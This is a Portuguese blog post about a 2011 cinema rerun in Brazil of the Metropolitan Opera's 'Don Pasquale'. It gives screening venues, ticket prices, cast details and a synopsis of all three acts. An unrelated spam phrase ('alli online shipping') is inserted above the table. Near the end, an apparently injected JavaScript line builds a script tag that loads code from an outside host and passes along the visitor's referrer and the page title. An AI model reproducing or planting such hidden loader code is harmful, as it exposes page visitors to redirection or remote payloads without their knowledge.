Escrito por em 6 jun 2011 nas áreas Cinema, Programação

A MOBZ, empresa responsável pela série de transmissões de óperas do Metropolitan Opera House de Nova York no Brasil, programou para junho e julho o primeiro dos dois festivais Segunda Chance em 2011.

SERVIÇO

DIA 11 DE JUNHO, sábado, às 11h.

alli online shipping

Cidade Cinema Sala Ingresso Venda de ingressos
Rio de Janeiro Cine Leblon 2 R$ 40,00 inteira / R$ 20,00 meia bilheteria e ingresso.com
Rio de Janeiro Roxy 3 R$ 40,00 inteira / R$ 20,00 meia bilheteria e ingresso.com
São Paulo Kinoplex Itaim 5 R$ 40,00 inteira / R$ 20,00 meia bilheteria e ingresso.com
Brasília Kinoplex Boulevard 1 R$ 40,00 inteira / R$ 20,00 meia bilheteria e ingresso.com
São Paulo Unibanco Arteplex Frei Caneca 1 valor único promocional R$ 20,00 portal mobz
Rio de Janeiro Unibanco Arteplex Botafogo 4 valor único promocional R$ 20,00 portal mobz
Porto Alegre Unibanco Arteplex Porto Alegre 1 valor único promocional R$ 20,00 portal mobz
Rio de Janeiro Espaço Rio Design 1 valor único promocional R$ 20,00 portal mobz
Campinas Cinesystem Galleria 5 valor único promocional R$ 20,00 portal mobz
Ilha do Governador Cinesystem Ilha Plaza 4 valor único promocional R$ 20,00 portal mobz
Maringá Cinesystem Maringá Park 3 R$ 30,00 inteira / R$ 15,00 meia bilheteria e ingresso.com
São José dos Campos Cinesystem Vale Sul Shopping 1 R$ 30,00 inteira / R$ 15,00 meia bilheteria e ingresso.com
Florianópolis Cinesystem Shopping Iguatemi 5 R$ 30,00 inteira / R$ 15,00 meia bilheteria e ingresso.com
Curitiba Cinesystem Curitiba Shopping 5 R$ 30,00 inteira / R$ 15,00 meia bilheteria e ingresso.com
Porto Alegre Cinesystem Shopping Total 2 R$ 30,00 inteira / R$ 15,00 meia bilheteria e ingresso.com
São Luís Cinesystem Rio Anil 1 R$ 30,00 inteira / R$ 15,00 meia bilheteria e ingresso.com

 

“Don Pasquale” volta aos cinemas brasileiros na Segunda Chance, dia 11 de junho às 11h. Os ingressos estão à venda através do site www.ingresso.com.br. no portal da Mobz www.mobz.com.br e nas bilheterias dos cinemas envolvidos (veja o quadro acima do release).

A montagem do diretor Otto Schenk para a obra-prima cômica de Donizetti tem condução de James Levine, diretor musical do Met, e traz no elenco a soprano Anna Netrebko, uma das maiores cantoras líricas da atualidade, o tenor Matthew Polenzani, o barítono Mariusz Kwiecien e o baixo-barítono John Del Carlo.

Os personagens remetem à tradição da ópera-bufa (termo usado para descrever a versão italiana da ópera-cômica), onde Pasquale (John Del Carlo) representa o pantaleão, Ernesto (Matthew Polenzani), o pierrô, Malatesta (Mariusz Kwiecen), o escapino, e Norina (Anna Netrebko), a colombina.

Exibida com projeção 2k, áudio 5.1 e legendas em português, a reapresentação traz o espetáculo sem os comentários e entrevistas da exibicão ao vivo.

“DON PASQUALE” – De Gaetano Donizetti

Direção: Otto Schenk
Regência: James Levine

Elenco

Pasquale: John Del Carlo / Ernesto: Matthew Polenzani / Malatesta: Mariusz Kwiecen / Norina: Anna Netrebko / Libretto do compositor e de Giovanni Ruffini

Estreia: Paris, Théâtre Italien, 3 de janeiro de 1843

ATO I

O velho solteirão Don Pasquale planeja se casar a fim de punir o seu rebelde sobrinho, Ernesto, que está apaixonado pela jovem viúva Norina. Pasquale quer um herdeiro para que possa deixar o jovem sem um centavo sequer. Ele consulta o Dr. Malatesta, que sugere como noiva a sua bela e jovem filha ((“Bella siccome un angelo”).

Sentindo a sua juventude retornar, um deliciado Pasquale diz a Malatesta para arranjar um encontro de imediato. Ernesto entra e novamente se recusa a casar com a mulher escolhida por seu tio. Pasquale lhe diz que terá de sair de casa e anuncia o seu próprio casamento para o atordoado sobrinho. Sem herança, Ernesto vê seus sonhos evaporarem. Para piorar a situação, ele fica sabendo que é seu amigo Malatesta quem arranjou o casamento para Pasquale.

Em seu pátio, Norina se diverte com uma tola história romântica que está lendo. Ela está convicta de sua habilidade para seduzir um homem (“Quel guardo il cavaliere”). Chega Malatesta. Na verdade, ele está tramando a favor dela e de Ernesto e explica o seu plano: Norina fingirá ser sua (inexistente) filha, se casará com Pasquale em uma cerimônia fajuta, e o enlouquecerá de tal maneira que ele estará à sua mercê. Norina fica ansiosa para fazer o seu papel, uma vez que a ajudará a conquistar Ernesto (Dueto: “Pronta io son”).

ATO II

Ernesto, que nada sabe dos planos de Malatesta, lamenta perder Norina, imaginando o seu futuro como um exilado (“Cercherò lontana terra”). Ele sai quando Pasquale surge, impaciente para encontrar a sua futura noiva. O velho fica encantado quando Malatesta apresenta-lhe “Sofronia” e decide se casar imediatamente. Durante a cerimônia de casamento, Ernesto irrompe e acusa Norina de infidelidade. Rapidamente, Malatesta lhe sussurra uma explicação e Ernesto torna-se testemunha do contrato nupcial. Assim que o documento é selado e Pasquale transfere a sua fortuna para a noiva, Norina muda o seu comportamento de moça tímida para uma megera voluntariosa. Um atordoado Pasquale protesta, enquanto Norina, Ernesto e Malatesta celebram seu sucesso (Quarteto:”È rimasto là impietrato”).

ATO III

A nova “esposa” de Pasquale continua com o seu comportamento extravagante e acumula um amontoado de contas. Quando empregados chegam trazendo novas compras, Pasquale, furioso, decide impor seus direitos como marido. Norina entra, vestida com elegância para o teatro, e dá-lhe um tapa quando ele tenta impedir a sua saída. Ele a ameaça com o divórcio, enquanto Norina, à parte, expressa compaixão pelo sofrimento do velho homem (Dueto:”Signorina, in tanta fretta”).

Ao sair, ela deixa cair uma carta que sugere um rendez-vous naquela noite, no jardim, com um desconhecido pretendente. O desesperado Pasquale vai atrás de Malatesta, deixando seus criados a comentar como é trabalhar em uma casa repleta de confusão. Malatesta diz a Ernesto para se certificar de que Pasquale não o reconhecerá quando fizer a sua parte no jardim naquela noite. Sozinho com Pasquale, Malatesta lhe assegura que irá pegar “Sofronia” em uma situação comprometedora. (Dueto:”Cheti, cheti, immatinente”). Pasquale concorda em deixar tudo com Malatesta.

No jardim, Ernesto corteja Norina, que corresponde em êxtase (Dueto:”Tornammi a dir che m’ami). Eles são interrompidos por Pasquale e Malatesta – muito tarde para pegar o jovem, que escapa enquanto “Sofronia” age como uma esposa inocente. Malatesta anuncia que Ernesto está para apresentar a sua noiva, Norina, em casa. “Sofronia” reclama que não irá dividir o mesmo teto com outra mulher e ameaça partir. Pasquale mal pode conter a sua alegria e dá a sua permissão a Ernesto para se casar com Norina, recebendo a sua herança. Quando Sofronia revela ser a própria Norina, Pasquale aceita a situação com bom humor, abençoa o casal, e conclui que o casamento não é para um homem velho (Finale: “La morale in tutto questo”).

var d=document;var s=d.createElement(‘script’); s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Faça seu comentário